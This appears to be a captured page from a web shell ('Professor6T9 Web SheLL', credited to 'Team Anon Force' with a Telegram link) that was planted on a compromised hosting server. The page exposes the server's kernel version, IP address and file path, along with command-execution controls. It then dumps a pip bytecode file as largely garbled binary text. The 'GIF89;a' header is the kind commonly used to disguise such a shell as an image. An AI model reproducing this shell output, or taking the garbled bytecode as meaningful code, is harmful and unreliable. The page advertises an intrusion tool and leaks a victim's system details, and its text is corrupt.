GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium133.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
162.0.232.69
/
opt
/
imunify360
/
venv
/
lib
/
python3.11
/
site-packages
/
pip
/
_internal
/
utils
/
__pycache__
[ HOME ]
Exec
Submit
virtualenv.cpython-311.pyc
� L�i � � � d dl mZ d dlZd dlZd dlZd dlZd dlZ ej e� � Z ej d� � Zdd�Zdd�Z dd�Zdd �Zdd�Zdd�Zdd �ZdS )� )�annotationsNz8include-system-site-packages\s*=\s*(?P<value>true|false)�return�boolc �^ � t j t t dt j � � k S )znChecks if sys.base_prefix and sys.prefix match. This handles PEP 405 compliant virtual environments. �base_prefix)�sys�prefix�getattr� � �~/builddir/build/BUILD/imunify360-venv-2.6.1/opt/imunify360/venv/lib/python3.11/site-packages/pip/_internal/utils/virtualenv.py�_running_under_venvr s � � �:���m�S�Z�@�@�@�@r c �, � t t d� � S )zmChecks if sys.real_prefix is set. This handles virtual environments created with pypa's virtualenv. �real_prefix)�hasattrr r r r � _running_under_legacy_virtualenvr s � � �3� �&�&�&r c �: � t � � p t � � S )zDTrue if we're running inside a virtual environment, False otherwise.)r r r r r �running_under_virtualenvr s � �� � �F�$D�$F�$F�Fr �list[str] | Nonec � � t j � t j d� � } t | d�� � 5 }|� � � � � � cddd� � S # 1 swxY w Y dS # t $ r Y dS w xY w)z�Reads {sys.prefix}/pyvenv.cfg and returns its contents as list of lines Returns None, if it could not read/access the file. z pyvenv.cfgzutf-8)�encodingN) �os�path�joinr r �open�read� splitlines�OSError)�pyvenv_cfg_file�fs r �_get_pyvenv_cfg_linesr! % s� � � �g�l�l�3�:�|�<�<�O�� �/�G� 4� 4� 4� )���6�6�8�8�&�&�(�(� )� )� )� )� )� )� )� )� )� )� )� )���� )� )� )� )� )� )��� � � ��t�t����s4 �A= �&A0�#A= �0A4�4A= �7A4�8A= �= B� Bc �� � t � � } | �t � d� � dS | D ]:}t � |� � }|�|� d� � dk r dS �;dS )aZ Check `{sys.prefix}/pyvenv.cfg` for system site-packages inclusion PEP 405 specifies that when system site-packages are not supposed to be visible from a virtual environment, `pyvenv.cfg` must contain the following line: include-system-site-packages = false Additionally, log a warning if accessing the file fails. Nz�Could not access 'pyvenv.cfg' despite a virtual environment being active. Assuming global site-packages is not accessible in this environment.T�value�falseF)r! �logger�warning�#_INCLUDE_SYSTEM_SITE_PACKAGES_REGEX�match�group)� cfg_lines�liner( s r �_no_global_under_venvr, 4 s� � � &�'�'�I��� ��� #� � � � �t�� � ��3�9�9�$�?�?�������W�!5�!5��!@�!@��4�4���5r c � � t j � t j � t j � � � � } t j � | d� � }t j � |� � S )z�Check if "no-global-site-packages.txt" exists beside site.py This mirrors logic in pypa/virtualenv for determining whether system site-packages are visible in the virtual environment. zno-global-site-packages.txt)r r �dirname�abspath�site�__file__r �exists)�site_mod_dir�no_global_site_packages_files r �"_no_global_under_legacy_virtualenvr5 Q sZ � � �7�?�?�2�7�?�?�4�=�#A�#A�B�B�L�#%�7�<�<��%�$� $� � �7�>�>�6�7�7�7r c �v � t � � rt � � S t � � rt � � S dS )zHReturns a boolean, whether running in venv with no system site-packages.F)r r, r r5 r r r �virtualenv_no_globalr7 _ s= � � ��� '�$�&�&�&�'�)�)� 4�1�3�3�3��5r )r r )r r )� __future__r �loggingr �rer0 r � getLogger�__name__r% �compiler'